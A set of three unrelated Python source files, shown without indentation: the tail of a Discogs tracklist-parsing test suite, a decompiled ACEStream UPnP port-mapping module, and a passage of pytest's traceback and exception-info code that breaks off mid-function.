def test_parse_medium_numbers_two_mediums_two_sided(self):
release = self._make_release_from_positions(['A1', 'B1', 'C1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 2)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[1].medium, 1)
self.assertEqual(t[1].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[2].medium, 2)
self.assertEqual(t[2].medium_total, 1)
self.assertEqual(t[2].medium_index, 1)
def test_parse_track_indices(self):
release = self._make_release_from_positions(['1', '2'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[0].index, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[1].index, 2)
self.assertEqual(t[1].medium_total, 2)
def test_parse_track_indices_several_media(self):
release = self._make_release_from_positions(['1-1', '1-2', '2-1',
'3-1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 3)
self.assertEqual(t[0].medium_index, 1)
self.assertEqual(t[0].index, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium_index, 2)
self.assertEqual(t[1].index, 2)
self.assertEqual(t[1].medium_total, 2)
self.assertEqual(t[2].medium_index, 1)
self.assertEqual(t[2].index, 3)
self.assertEqual(t[2].medium_total, 1)
self.assertEqual(t[3].medium_index, 1)
self.assertEqual(t[3].index, 4)
self.assertEqual(t[3].medium_total, 1)
def test_parse_position(self):
"""Test the conversion of discogs `position` to medium, medium_index
and subtrack_index."""
# List of tuples (discogs_position, (medium, medium_index, subindex))
positions = [('1', (None, '1', None)),
('A12', ('A', '12', None)),
('12-34', ('12-', '34', None)),
('CD1-1', ('CD1-', '1', None)),
('1.12', (None, '1', '12')),
('12.a', (None, '12', 'A')),
('12.34', (None, '12', '34')),
('1ab', (None, '1', 'AB')),
# Non-standard
('IV', ('IV', None, None)),
]
d = DiscogsPlugin()
for position, expected in positions:
self.assertEqual(d.get_track_index(position), expected)
def test_parse_tracklist_without_sides(self):
"""Test standard Discogs position 12.2.9#1: "without sides"."""
release = self._make_release_from_positions(['1', '2', '3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_with_sides(self):
"""Test standard Discogs position 12.2.9#2: "with sides"."""
release = self._make_release_from_positions(['A1', 'A2', 'B1', 'B2'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1) # 2 sides = 1 LP
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_multiple_lp(self):
"""Test standard Discogs position 12.2.9#3: "multiple LP"."""
release = self._make_release_from_positions(['A1', 'A2', 'B1', 'C1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2) # 3 sides = 1 LP + 1 LP
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_multiple_cd(self):
"""Test standard Discogs position 12.2.9#4: "multiple CDs"."""
release = self._make_release_from_positions(['1-1', '1-2', '2-1',
'3-1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 3)
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_non_standard(self):
"""Test non standard Discogs position."""
release = self._make_release_from_positions(['I', 'II', 'III', 'IV'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 4)
def test_parse_tracklist_subtracks_dot(self):
"""Test standard Discogs position 12.2.9#5: "sub tracks, dots"."""
release = self._make_release_from_positions(['1', '2.1', '2.2', '3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
release = self._make_release_from_positions(['A1', 'A2.1', 'A2.2',
'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_letter(self):
"""Test standard Discogs position 12.2.9#5: "sub tracks, letter"."""
release = self._make_release_from_positions(['A1', 'A2a', 'A2b', 'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
release = self._make_release_from_positions(['A1', 'A2.a', 'A2.b',
'A3'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_extra_material(self):
"""Test standard Discogs position 12.2.9#6: "extra material"."""
release = self._make_release_from_positions(['1', '2', 'Video 1'])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2)
self.assertEqual(len(d.tracks), 3)
def test_parse_tracklist_subtracks_indices(self):
"""Test parsing of subtracks that include index tracks."""
release = self._make_release_from_positions(['', '', '1.1', '1.2'])
# Track 1: Index track with medium title
release.data['tracklist'][0]['title'] = 'MEDIUM TITLE'
# Track 2: Index track with track group title
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(d.tracks[0].disctitle, 'MEDIUM TITLE')
self.assertEqual(len(d.tracks), 1)
self.assertEqual(d.tracks[0].title, 'TRACK GROUP TITLE')
def test_parse_tracklist_subtracks_nested_logical(self):
"""Test parsing of subtracks defined inside a index track that are
logical subtracks (ie. should be grouped together into a single track).
"""
release = self._make_release_from_positions(['1', '', '3'])
# Track 2: Index track with track group title, and sub_tracks
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
release.data['tracklist'][1]['sub_tracks'] = [
self._make_track('TITLE ONE', '2.1', '01:01'),
self._make_track('TITLE TWO', '2.2', '02:02')
]
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 3)
self.assertEqual(d.tracks[1].title, 'TRACK GROUP TITLE')
def test_parse_tracklist_subtracks_nested_physical(self):
"""Test parsing of subtracks defined inside a index track that are
physical subtracks (ie. should not be grouped together).
"""
release = self._make_release_from_positions(['1', '', '4'])
# Track 2: Index track with track group title, and sub_tracks
release.data['tracklist'][1]['title'] = 'TRACK GROUP TITLE'
release.data['tracklist'][1]['sub_tracks'] = [
self._make_track('TITLE ONE', '2', '01:01'),
self._make_track('TITLE TWO', '3', '02:02')
]
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 1)
self.assertEqual(len(d.tracks), 4)
self.assertEqual(d.tracks[1].title, 'TITLE ONE')
self.assertEqual(d.tracks[2].title, 'TITLE TWO')
def test_parse_tracklist_disctitles(self):
"""Test parsing of index tracks that act as disc titles."""
release = self._make_release_from_positions(['', '1-1', '1-2', '',
'2-1'])
# Track 1: Index track with medium title (Cd1)
release.data['tracklist'][0]['title'] = 'MEDIUM TITLE CD1'
# Track 4: Index track with medium title (Cd2)
release.data['tracklist'][3]['title'] = 'MEDIUM TITLE CD2'
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.mediums, 2)
self.assertEqual(d.tracks[0].disctitle, 'MEDIUM TITLE CD1')
self.assertEqual(d.tracks[1].disctitle, 'MEDIUM TITLE CD1')
self.assertEqual(d.tracks[2].disctitle, 'MEDIUM TITLE CD2')
self.assertEqual(len(d.tracks), 3)
def test_parse_minimal_release(self):
"""Test parsing of a release with the minimal amount of information."""
data = {'id': 123,
'tracklist': [self._make_track('A', '1', '01:01')],
'artists': [{'name': 'ARTIST NAME', 'id': 321, 'join': ''}],
'title': 'TITLE'}
release = Bag(data=data,
title=data['title'],
artists=[Bag(data=d) for d in data['artists']])
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d.artist, 'ARTIST NAME')
self.assertEqual(d.album, 'TITLE')
self.assertEqual(len(d.tracks), 1)
def test_parse_release_without_required_fields(self):
"""Test parsing of a release that does not have the required fields."""
release = Bag(data={}, refresh=lambda *args: None)
with capture_log() as logs:
d = DiscogsPlugin().get_album_info(release)
self.assertEqual(d, None)
self.assertIn('Release does not contain the required fields', logs[0])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
|
#Embedded file name: ACEStream\Core\BitTornado\natpunch.pyo
import sys
import socket
import time
from traceback import print_exc
from subnetparse import IP_List
from clock import clock
from __init__ import createPeerID
from ACEStream.Core.NATFirewall.upnp import UPnPPlatformIndependent, UPnPError
from ACEStream.Core.NATFirewall.guessip import get_my_wan_ip
try:
True
except:
True = 1
False = 0
DEBUG = False
EXPIRE_CACHE = 30
ID = 'BT-' + createPeerID()[-4:]
try:
import pythoncom, win32com.client
win32_imported = 1
except ImportError:
if DEBUG and sys.platform == 'win32':
print >> sys.stderr, "natpunch: ERROR: pywin32 package not installed, UPnP mode 2 won't work now"
win32_imported = 0
UPnPError = UPnPError
class _UPnP1:
def __init__(self):
self.map = None
self.last_got_map = -100000000000.0
def _get_map(self):
if self.last_got_map + EXPIRE_CACHE < clock():
try:
dispatcher = win32com.client.Dispatch('HNetCfg.NATUPnP')
self.map = dispatcher.StaticPortMappingCollection
self.last_got_map = clock()
except:
if DEBUG:
print_exc()
self.map = None
return self.map
def test(self):
try:
# probe the mapping collection to verify UPnP 1 is usable
assert self._get_map() is not None
success = True
except:
if DEBUG:
print_exc()
success = False
return success
def open(self, ip, p, iproto = 'TCP'):
map = self._get_map()
try:
map.Add(p, iproto, p, ip, True, ID)
if DEBUG:
print >> sys.stderr, 'upnp1: successfully opened port: ' + ip + ':' + str(p)
success = True
except:
if DEBUG:
print >> sys.stderr, "upnp1: COULDN'T OPEN " + str(p)
print_exc()
success = False
return success
def close(self, p, iproto = 'TCP'):
map = self._get_map()
try:
map.Remove(p, iproto)
success = True
if DEBUG:
print >> sys.stderr, 'upnp1: successfully closed port: ' + str(p)
except:
if DEBUG:
print >> sys.stderr, "upnp1: COULDN'T CLOSE " + str(p)
print_exc()
success = False
return success
def clean(self, retry = False, iproto = 'TCP'):
if not win32_imported:
return
try:
map = self._get_map()
ports_in_use = []
for i in xrange(len(map)):
try:
mapping = map[i]
port = mapping.ExternalPort
prot = str(mapping.Protocol).lower()
desc = str(mapping.Description).lower()
except:
port = None
if port and prot == iproto.lower() and desc[:3] == 'bt-':
ports_in_use.append(port)
success = True
for port in ports_in_use:
try:
map.Remove(port, iproto)
except:
success = False
if not success and not retry:
self.clean(retry=True)
except:
pass
def get_ext_ip(self):
return None
class _UPnP2:
def __init__(self):
self.services = None
self.last_got_services = -100000000000.0
def _get_services(self):
if not self.services or self.last_got_services + EXPIRE_CACHE < clock():
self.services = []
try:
f = win32com.client.Dispatch('UPnP.UPnPDeviceFinder')
for t in ('urn:schemas-upnp-org:service:WANIPConnection:1', 'urn:schemas-upnp-org:service:WANPPPConnection:1'):
try:
conns = f.FindByType(t, 0)
for c in xrange(len(conns)):
try:
svcs = conns[c].Services
for s in xrange(len(svcs)):
try:
self.services.append(svcs[s])
except:
if DEBUG:
print_exc()
except:
if DEBUG:
print_exc()
except:
if DEBUG:
print_exc()
except:
if DEBUG:
print_exc()
self.last_got_services = clock()
return self.services
def test(self):
try:
# probe for WAN connection services to verify UPnP 2 is usable
assert self._get_services()
success = True
except:
success = False
return success
def open(self, ip, p, iproto = 'TCP'):
svcs = self._get_services()
success = False
for s in svcs:
try:
s.InvokeAction('AddPortMapping', ['',
p,
iproto,
p,
ip,
True,
ID,
0], '')
success = True
except:
if DEBUG:
print_exc()
if DEBUG and not success:
print >> sys.stderr, "upnp2: COULDN'T OPEN " + str(p)
print_exc()
return success
def close(self, p, iproto = 'TCP'):
svcs = self._get_services()
success = False
for s in svcs:
try:
s.InvokeAction('DeletePortMapping', ['', p, iproto], '')
success = True
except:
if DEBUG:
print_exc()
if DEBUG and not success:
print >> sys.stderr, "upnp2: COULDN'T CLOSE " + str(p)
print_exc()
return success
def get_ext_ip(self):
svcs = self._get_services()
success = None
for s in svcs:
try:
ret = s.InvokeAction('GetExternalIPAddress', [], '')
if DEBUG:
print >> sys.stderr, 'upnp2: GetExternalIPAddress returned', ret
dns = ret[1]
if str(dns[0]) != '':
success = str(dns[0])
elif DEBUG:
print >> sys.stderr, 'upnp2: RETURNED IP ADDRESS EMPTY'
except:
if DEBUG:
print_exc()
if DEBUG and not success:
print >> sys.stderr, "upnp2: COULDN'T GET EXT IP ADDR"
return success
class _UPnP3:
def __init__(self):
self.u = UPnPPlatformIndependent()
def test(self):
try:
retries = 0
interval = 4
while retries < 10:
self.u.discover()
if self.u.found_wanted_services():
if DEBUG:
print >> sys.stderr, '_UPnP3::test: success'
return True
retries += 1
interval *= 2
if DEBUG:
print >> sys.stderr, '_UPnP3::test: failed: retry in %d seconds' % interval
time.sleep(interval)
return False
except:
if DEBUG:
print_exc()
return False
def open(self, ip, p, iproto = 'TCP'):
try:
self.u.add_port_map(ip, p, iproto=iproto)
return True
except UPnPError as e:
if DEBUG:
print_exc()
raise e
except:
if DEBUG:
print_exc()
return False
def close(self, p, iproto = 'TCP'):
try:
self.u.del_port_map(p, iproto=iproto)
return True
except UPnPError as e:
if DEBUG:
print_exc()
raise e
except:
if DEBUG:
print_exc()
return False
def get_ext_ip(self):
try:
return self.u.get_ext_ip()
except UPnPError as e:
if DEBUG:
print_exc()
raise e
except:
if DEBUG:
print_exc()
return None
class UPnPWrapper:
__single = None
def __init__(self):
if UPnPWrapper.__single:
raise RuntimeError, 'UPnPWrapper is singleton'
UPnPWrapper.__single = self
self.upnp1 = _UPnP1()
self.upnp2 = _UPnP2()
self.upnp3 = _UPnP3()
self.upnplist = (None,
self.upnp1,
self.upnp2,
self.upnp3)
self.upnp = None
self.local_ip = None
self.last_got_ip = -100000000000.0
def getInstance(*args, **kw):
if UPnPWrapper.__single is None:
UPnPWrapper(*args, **kw)
return UPnPWrapper.__single
getInstance = staticmethod(getInstance)
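# Typical access pattern (sketch): obtain the shared instance instead of
# constructing UPnPWrapper directly, which raises once the singleton
# exists:
#
#     u = UPnPWrapper.getInstance()
#     u.register(get_my_wan_ip())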
def register(self, guessed_localip):
self.local_ip = guessed_localip
def get_ip(self):
if self.last_got_ip + EXPIRE_CACHE < clock():
if self.local_ip is None:
local_ips = IP_List()
local_ips.set_intranet_addresses()
try:
for info in socket.getaddrinfo(socket.gethostname(), 0, socket.AF_INET):
self.local_ip = info[4][0]
if local_ips.includes(self.local_ip):
self.last_got_ip = clock()
if DEBUG:
print >> sys.stderr, 'upnpX: Local IP found: ' + self.local_ip
break
else:
raise ValueError("upnpX: couldn't find intranet IP")
except:
self.local_ip = None
if DEBUG:
print >> sys.stderr, 'upnpX: Error finding local IP'
print_exc()
return self.local_ip
def test(self, upnp_type):
if DEBUG:
print >> sys.stderr, 'upnpX: testing UPnP type ' + str(upnp_type)
if not upnp_type or self.get_ip() is None or upnp_type <= 2 and not win32_imported:
if DEBUG:
print >> sys.stderr, 'upnpX: UPnP not supported'
return 0
if upnp_type != 3:
pythoncom.CoInitialize()
self.upnp = self.upnplist[upnp_type]
if self.upnp.test():
if DEBUG:
print >> sys.stderr, 'upnpX: ok'
return upnp_type
if DEBUG:
print >> sys.stderr, 'upnpX: tested bad'
return 0
def open(self, p, iproto = 'TCP'):
return self.upnp.open(self.get_ip(), p, iproto=iproto)
def close(self, p, iproto = 'TCP'):
return self.upnp.close(p, iproto=iproto)
def clean(self, iproto = 'TCP'):
return self.upnp1.clean(iproto=iproto)
def get_ext_ip(self):
return self.upnp.get_ext_ip()
if __name__ == '__main__':
ip = get_my_wan_ip()
print >> sys.stderr, 'guessed ip', ip
u = UPnPWrapper()
u.register(ip)
print >> sys.stderr, 'TEST RETURNED', u.test(3)
print >> sys.stderr, 'IGD says my external IP is', u.get_ext_ip()
print >> sys.stderr, 'IGD open returned', u.open(6881)
print >> sys.stderr, 'IGD close returned', u.close(6881)
|
|
from __future__ import absolute_import, division, print_function
import inspect
import sys
import traceback
from inspect import CO_VARARGS, CO_VARKEYWORDS
import re
from weakref import ref
from _pytest.compat import _PY2, _PY3, PY35, safe_str
import py
builtin_repr = repr
if _PY3:
from traceback import format_exception_only
else:
from ._py2traceback import format_exception_only
class Code(object):
""" wrapper around Python code objects """
def __init__(self, rawcode):
if not hasattr(rawcode, "co_filename"):
rawcode = getrawcode(rawcode)
try:
self.filename = rawcode.co_filename
self.firstlineno = rawcode.co_firstlineno - 1
self.name = rawcode.co_name
except AttributeError:
raise TypeError("not a code object: %r" % (rawcode,))
self.raw = rawcode
def __eq__(self, other):
return self.raw == other.raw
__hash__ = None
def __ne__(self, other):
return not self == other
@property
def path(self):
""" return a path object pointing to source code (note that it
might not point to an actually existing file). """
try:
p = py.path.local(self.raw.co_filename)
# maybe don't try this checking
if not p.check():
raise OSError("py.path check failed.")
except OSError:
# XXX maybe try harder like the weird logic
# in the standard lib [linecache.updatecache] does?
p = self.raw.co_filename
return p
@property
def fullsource(self):
""" return a _pytest._code.Source object for the full source file of the code
"""
from _pytest._code import source
full, _ = source.findsource(self.raw)
return full
def source(self):
""" return a _pytest._code.Source object for the code object's source only
"""
# return source only for that part of code
import _pytest._code
return _pytest._code.Source(self.raw)
def getargs(self, var=False):
""" return a tuple with the argument names for the code object
if 'var' is set True also return the names of the variable and
keyword arguments when present
"""
# handy shortcut for getting args
raw = self.raw
argcount = raw.co_argcount
if var:
# co_flags & CO_VARARGS yields the flag value (4/8), not 1,
# so count each present flag as a single extra argument name
argcount += bool(raw.co_flags & CO_VARARGS)
argcount += bool(raw.co_flags & CO_VARKEYWORDS)
return raw.co_varnames[:argcount]
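# Sketch: for `def f(a, b, *args, **kw): pass`,
# Code(f.__code__).getargs(var=True) returns ('a', 'b', 'args', 'kw').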
class Frame(object):
"""Wrapper around a Python frame holding f_locals and f_globals
in which expressions can be evaluated."""
def __init__(self, frame):
self.lineno = frame.f_lineno - 1
self.f_globals = frame.f_globals
self.f_locals = frame.f_locals
self.raw = frame
self.code = Code(frame.f_code)
@property
def statement(self):
""" statement this frame is at """
import _pytest._code
if self.code.fullsource is None:
return _pytest._code.Source("")
return self.code.fullsource.getstatement(self.lineno)
def eval(self, code, **vars):
""" evaluate 'code' in the frame
'vars' are optional additional local variables
returns the result of the evaluation
"""
f_locals = self.f_locals.copy()
f_locals.update(vars)
return eval(code, self.f_globals, f_locals)
def exec_(self, code, **vars):
""" exec 'code' in the frame
'vars' are optional additional local variables
"""
f_locals = self.f_locals.copy()
f_locals.update(vars)
py.builtin.exec_(code, self.f_globals, f_locals)
def repr(self, object):
""" return a 'safe' (non-recursive, one-line) string repr for 'object'
"""
return py.io.saferepr(object)
def is_true(self, object):
return object
def getargs(self, var=False):
""" return a list of tuples (name, value) for all arguments
if 'var' is set True also include the variable and keyword
arguments when present
"""
retval = []
for arg in self.code.getargs(var):
try:
retval.append((arg, self.f_locals[arg]))
except KeyError:
pass # this can occur when using Psyco
return retval
class TracebackEntry(object):
""" a single entry in a traceback """
_repr_style = None
exprinfo = None
def __init__(self, rawentry, excinfo=None):
self._excinfo = excinfo
self._rawentry = rawentry
self.lineno = rawentry.tb_lineno - 1
def set_repr_style(self, mode):
assert mode in ("short", "long")
self._repr_style = mode
@property
def frame(self):
import _pytest._code
return _pytest._code.Frame(self._rawentry.tb_frame)
@property
def relline(self):
return self.lineno - self.frame.code.firstlineno
def __repr__(self):
return "<TracebackEntry %s:%d>" % (self.frame.code.path, self.lineno + 1)
@property
def statement(self):
""" _pytest._code.Source object for the current statement """
source = self.frame.code.fullsource
return source.getstatement(self.lineno)
@property
def path(self):
""" path to the source code """
return self.frame.code.path
def getlocals(self):
return self.frame.f_locals
locals = property(getlocals, None, None, "locals of underlying frame")
def getfirstlinesource(self):
# on Jython this firstlineno can be -1 apparently
return max(self.frame.code.firstlineno, 0)
def getsource(self, astcache=None):
""" return failing source code. """
# we use the passed in astcache to not reparse asttrees
# within exception info printing
from _pytest._code.source import getstatementrange_ast
source = self.frame.code.fullsource
if source is None:
return None
key = astnode = None
if astcache is not None:
key = self.frame.code.path
if key is not None:
astnode = astcache.get(key, None)
start = self.getfirstlinesource()
try:
astnode, _, end = getstatementrange_ast(self.lineno, source,
astnode=astnode)
except SyntaxError:
end = self.lineno + 1
else:
if key is not None:
astcache[key] = astnode
return source[start:end]
source = property(getsource)
def ishidden(self):
""" return True if the current frame has a var __tracebackhide__
resolving to True
If __tracebackhide__ is a callable, it gets called with the
ExceptionInfo instance and can decide whether to hide the traceback.
Mostly for internal use.
"""
try:
tbh = self.frame.f_locals['__tracebackhide__']
except KeyError:
try:
tbh = self.frame.f_globals['__tracebackhide__']
except KeyError:
return False
if callable(tbh):
return tbh(None if self._excinfo is None else self._excinfo())
else:
return tbh
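# Typical use: a test helper hides its own frame from reported tracebacks
# by setting a local flag, e.g.:
#
#     def check_positive(x):
#         __tracebackhide__ = True
#         assert x > 0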
def __str__(self):
try:
fn = str(self.path)
except py.error.Error:
fn = '???'
name = self.frame.code.name
try:
line = str(self.statement).lstrip()
except KeyboardInterrupt:
raise
except: # noqa
line = "???"
return " File %r:%d in %s\n %s\n" % (fn, self.lineno + 1, name, line)
def name(self):
return self.frame.code.raw.co_name
name = property(name, None, None, "co_name of underlying code")
class Traceback(list):
""" Traceback objects encapsulate and offer higher level
access to Traceback entries.
"""
Entry = TracebackEntry
def __init__(self, tb, excinfo=None):
""" initialize from given python traceback object and ExceptionInfo """
self._excinfo = excinfo
if hasattr(tb, 'tb_next'):
def f(cur):
while cur is not None:
yield self.Entry(cur, excinfo=excinfo)
cur = cur.tb_next
list.__init__(self, f(tb))
else:
list.__init__(self, tb)
def cut(self, path=None, lineno=None, firstlineno=None, excludepath=None):
""" return a Traceback instance wrapping part of this Traceback
by providing any combination of path, lineno and firstlineno, the
first frame to start the to-be-returned traceback is determined
this allows cutting the first part of a Traceback instance e.g.
for formatting reasons (removing some uninteresting bits that deal
with handling of the exception/traceback)
"""
for x in self:
code = x.frame.code
codepath = code.path
if ((path is None or codepath == path) and
(excludepath is None or not hasattr(codepath, 'relto') or
not codepath.relto(excludepath)) and
(lineno is None or x.lineno == lineno) and
(firstlineno is None or x.frame.code.firstlineno == firstlineno)):
return Traceback(x._rawentry, self._excinfo)
return self
def __getitem__(self, key):
val = super(Traceback, self).__getitem__(key)
if isinstance(key, type(slice(0))):
val = self.__class__(val)
return val
def filter(self, fn=lambda x: not x.ishidden()):
""" return a Traceback instance with certain items removed
fn is a function that gets a single argument, a TracebackEntry
instance, and should return True when the item should be added
to the Traceback, False when not
by default this removes all the TracebackEntries which are hidden
(see ishidden() above)
"""
return Traceback(filter(fn, self), self._excinfo)
def getcrashentry(self):
""" return last non-hidden traceback entry that lead
to the exception of a traceback.
"""
for i in range(-1, -len(self) - 1, -1):
entry = self[i]
if not entry.ishidden():
return entry
return self[-1]
def recursionindex(self):
""" return the index of the frame/TracebackEntry where recursion
originates if appropriate, None if no recursion occurred
"""
cache = {}
for i, entry in enumerate(self):
# id for the code.raw is needed to work around
# the strange metaprogramming in the decorator lib from pypi
# which generates code objects that have hash/value equality
# XXX needs a test
key = entry.frame.code.path, id(entry.frame.code.raw), entry.lineno
# print "checking for recursion at", key
values = cache.setdefault(key, [])
if values:
f = entry.frame
loc = f.f_locals
for otherloc in values:
if f.is_true(f.eval(co_equal,
__recursioncache_locals_1=loc,
__recursioncache_locals_2=otherloc)):
return i
values.append(entry.frame.f_locals)
return None
co_equal = compile('__recursioncache_locals_1 == __recursioncache_locals_2',
'?', 'eval')
class ExceptionInfo(object):
""" wraps sys.exc_info() objects and offers
help for navigating the traceback.
"""
_striptext = ''
_assert_start_repr = "AssertionError(u\'assert " if _PY2 else "AssertionError(\'assert "
def __init__(self, tup=None, exprinfo=None):
import _pytest._code
if tup is None:
tup = sys.exc_info()
if exprinfo is None and isinstance(tup[1], AssertionError):
exprinfo = getattr(tup[1], 'msg', None)
if exprinfo is None:
exprinfo = py.io.saferepr(tup[1])
if exprinfo and exprinfo.startswith(self._assert_start_repr):
self._striptext = 'AssertionError: '
self._excinfo = tup
#: the exception class
self.type = tup[0]
#: the exception instance
self.value = tup[1]
#: the exception raw traceback
self.tb = tup[2]
#: the exception type name
self.typename = self.type.__name__
#: the exception traceback (_pytest._code.Traceback instance)
self.traceback = _pytest._code.Traceback(self.tb, excinfo=ref(self))
def __repr__(self):
return "<ExceptionInfo %s tblen=%d>" % (self.typename, len(self.traceback))
def exconly(self, tryshort=False):
""" return the exception as a string
when 'tryshort' resolves to True, and the exception is a
_pytest._code._AssertionError, only the actual exception part of
the exception representation is returned (so 'AssertionError: ' is
removed from the beginning)
"""
lines = format_exception_only(self.type, self.value)
text = ''.join(lines)
text = text.rstrip()
if tryshort:
if text.startswith(self._striptext):
text = text[len(self._striptext):]
return text
def errisinstance(self, exc):
""" return True if the exception is an instance of exc """
return isinstance(self.value, exc)
def _getreprcrash(self):
exconly = self.exconly(tryshort=True)
entry = self.traceback.getcrashentry()
path, lineno = entry.frame.code.raw.co_filename, entry.lineno
return ReprFileLocation(path, lineno + 1, exconly)
def getrepr(self, showlocals=False, style="long",
abspath=False, tbfilter=True, funcargs=False):
""" return str()able representation of this exception info.
showlocals: show locals per traceback entry
style: long|short|no|native traceback style
tbfilter: hide entries (where __tracebackhide__ is true)
in case of style==native, tbfilter and showlocals are ignored.
"""
if style == 'native':
return ReprExceptionInfo(ReprTracebackNative(
traceback.format_exception(
self.type,
self.value,
self.traceback[0]._rawentry,
)), self._getreprcrash())
fmt = FormattedExcinfo(showlocals=showlocals, style=style,
abspath=abspath, tbfilter=tbfilter, funcargs=funcargs)
return fmt.repr_excinfo(self)
def __str__(self):
entry = self.traceback[-1]
loc = ReprFileLocation(entry.path, entry.lineno + 1, self.exconly())
return str(loc)
def __unicode__(self):
entry = self.traceback[-1]
loc = ReprFileLocation(entry.path, entry.lineno + 1, self.exconly())
return unicode(loc)
def match(self, regexp):
"""
Match the regular expression 'regexp' on the string representation of
the exception. If it matches then True is returned (so that it is
possible to write 'assert excinfo.match()'). If it doesn't match an
AssertionError is raised.
"""
__tracebackhide__ = True
if not re.search(regexp, str(self.value)):
assert 0, "Pattern '{0!s}' not found in '{1!s}'".format(
regexp, self.value)
return True
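# Typical use (sketch) together with pytest.raises:
#
#     with pytest.raises(ValueError) as excinfo:
#         int('not a number')
#     excinfo.match(r'invalid literal')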
class FormattedExcinfo(object):
""" presenting information about failing Functions and Generators. """
# for traceback entries
flow_marker = ">"
fail_marker = "E"
def __init__(self, showlocals=False, style="long", abspath=True, tbfilter=True, funcargs=False):
self.showlocals = showlocals
self.style = style
self.tbfilter = tbfilter
self.funcargs = funcargs
self.abspath = abspath
self.astcache = {}
def _getindent(self, source):
# figure out indent for given source
try:
s = str(source.getstatement(len(source) - 1))
except KeyboardInterrupt:
raise
except: # noqa
try:
s = str(source[-1])
except KeyboardInterrupt:
raise
except: # noqa
return 0
return 4 + (len(s) - len(s.lstrip()))
def _getentrysource(self, entry):
source = entry.getsource(self.astcache)
if source is not None:
source = source.deindent()
return source
def _saferepr(self, obj):
return py.io.saferepr(obj)
def repr_args(self, entry):
if self.funcargs:
args = []
for argname, argvalue in entry.frame.getargs(var=True):
args.append((argname, self._saferepr(argvalue)))
return ReprFuncArgs(args)
def get_source(self, source, line_index=-1, excinfo=None, short=False):
""" return formatted and marked up source lines. """
import _pytest._code
lines = []
if source is None or line_index >= len(source.lines):
source = _pytest._code.Source("???")
line_index = 0
if line_index < 0:
line_index += len(source)
space_prefix = " "
if short:
lines.append(space_prefix + source.lines[line_index].strip())
else:
for line in source.lines[:line_index]:
lines.append(space_prefix + line)
lines.append(self.flow_marker + " " + source.lines[line_index])
for line in source.lines[line_index + 1:]:
lines.append(space_prefix + line)
if excinfo is not None:
indent = 4 if short else self._getindent(source)
lines.extend(self.get_exconly(excinfo, indent=indent, markall=True))
return lines
def get_exconly(self, excinfo, indent=4, markall=False):
lines = []
indent = " " * indent
# get the real exception information out
exlines = excinfo.exconly(tryshort=True).split('\n')
failindent = self.fail_marker + indent[1:]
for line in exlines:
lines.append(failindent + line)
if not markall:
failindent = indent
return lines
def repr_locals(self, locals):
if self.showlocals:
lines = []
keys = [loc for loc in locals if loc[0] != "@"]
keys.sort()
for name in keys:
value = locals[name]
if name == '__builtins__':
lines.append("__builtins__ = <builtins>")
else:
# This formatting could all be handled by the
# _repr() function, which is only reprlib.Repr in
# disguise, so is very configurable.
str_repr = self._saferepr(value)
# if len(str_repr) < 70 or not isinstance(value,
# (list, tuple, dict)):
lines.append("%-10s = %s" % (name, str_repr))
# else:
# self._line("%-10s =\\" % (name,))
# # XXX
# pprint.pprint(value, stream=self.excinfowriter)
return ReprLocals(lines)
def repr_traceback_entry(self, entry, excinfo=None):
import _pytest._code
source = self._getentrysource(entry)
if source is None:
source = _pytest._code.Source("???")
line_index = 0
else:
# entry.getfirstlinesource() can be -1, should be 0 on jython
line_index = entry.lineno - max(entry.getfirstlinesource(), 0)
lines = []
style = entry._repr_style
if style is None:
style = self.style
if style in ("short", "long"):
short = style == "short"
reprargs = self.repr_args(entry) if not short else None
s = self.get_source(source, line_index, excinfo, short=short)
lines.extend(s)
if short:
message = "in %s" % (entry.name)
else:
message = excinfo and excinfo.typename or ""
path = self._makepath(entry.path)
filelocrepr = ReprFileLocation(path, entry.lineno + 1, message)
localsrepr = None
if not short:
localsrepr = self.repr_locals(entry.locals)
return ReprEntry(lines, reprargs, localsrepr, filelocrepr, style)
if excinfo:
lines.extend(self.get_exconly(excinfo, indent=4))
return ReprEntry(lines, None, None, None, style)
def _makepath(self, path):
if not self.abspath:
try:
np = py.path.local().bestrelpath(path)
except OSError:
return path
if len(np) < len(str(path)):
